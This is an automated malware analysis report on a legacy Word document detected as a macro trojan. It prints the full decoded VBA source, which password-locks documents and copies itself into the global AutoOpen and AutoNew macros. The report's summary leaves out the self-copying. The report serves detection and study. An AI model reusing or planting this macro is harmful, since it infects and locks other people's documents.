Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 bdf0e8be90d336ac…

MALICIOUS

Office (OLE)

29.0 KB Created: 1998-01-01 00:54:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: a8e8a63238a2921c4aea47a00756d92a SHA-1: 07453c271fe6c3571ac03b94183a46719fe6ce06 SHA-256: bdf0e8be90d336ac4564684d9d4407aae3fdf4b219c84e6dd58df09260802984
200 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample contains a VBA macro with an AutoOpen subroutine, which is a common technique for executing malicious code upon opening a document. The script displays a message box to the user, prompting them to answer 'yes' to a question about being a student, and threatens to lock the document with a password. If the user does not respond positively, the document is saved with the password 'Saya!'. This behavior suggests a social engineering tactic to coerce the user into providing a password or to lock their document.

Heuristics 4

  • ClamAV: Doc.Trojan.Alliance-6 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Alliance-6
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1238 bytes
SHA-256: 00c373717c18f46e7fdbcab5ec432e53583e7a0c54e55d2457074d8d178d3c4a
Detection
ClamAV: Doc.Trojan.Alliance-6
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "AutoOpen"

Public Sub MAIN()
Dim Fname$
Dim MacName$
Dim Button
On Error GoTo -1: On Error GoTo ErrorHandler
    
Fname$ = WordBasic.[FileName$]()
MacName$ = Fname$ + ":AutoOpen"

WordBasic.FileSummaryInfo Subject:="VIRUS WINWORD.FSKSM"
WordBasic.FileSummaryInfo Author:="The Skidz.....CE"

Button = WordBasic.MsgBox("ARE YOU A FSKSM STUDENT?" + Chr(13) + "ANSWER YES OR YOUR DOCUMENT WILL BE LOCKED BY MY PASSWORD !" + Chr(13) + "FAKULTI SAINS KOMPUTER DAN SISTEM MAKLUMAT", "UNIVERSITI TEKNOLOGI MALAYSIA", 4)

If Button = 0 Then
   WordBasic.FileSaveAs Password:="Saya!"
End If

WordBasic.MacroCopy MacName$, "Global:AutoNew", -1
WordBasic.MacroCopy MacName$, "Global:AutoOpen", -1

ErrorHandler:

        If WordBasic.IsDocumentDirty() = -1 Then
            WordBasic.MacroCopy "Global:AutoOpen", MacName$, -1
        End If
        WordBasic.FileSaveAs Format:=1

    
End Sub

Attribute VB_Name = "NewMacros"